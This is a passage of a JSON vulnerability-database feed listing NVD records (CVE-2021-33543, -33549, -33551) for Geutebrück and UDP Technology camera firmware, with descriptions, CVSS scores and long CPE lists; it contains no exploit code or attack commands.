"cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-09-10T05:28:53", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33543", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33543"], "modified": "2022-09-10T02:46:00", "cpe": ["cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2"], "id": "CVE-2021-33543", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33543", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:37:39", "description": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33549", "cwe": ["CWE-121"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33549"], "modified": "2021-09-27T14:30:00", "cpe": ["cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27"], "id": "CVE-2021-33549", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-11-21T21:40:15", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33551", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33551"], "modified": "2022-11-21T19:36:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", 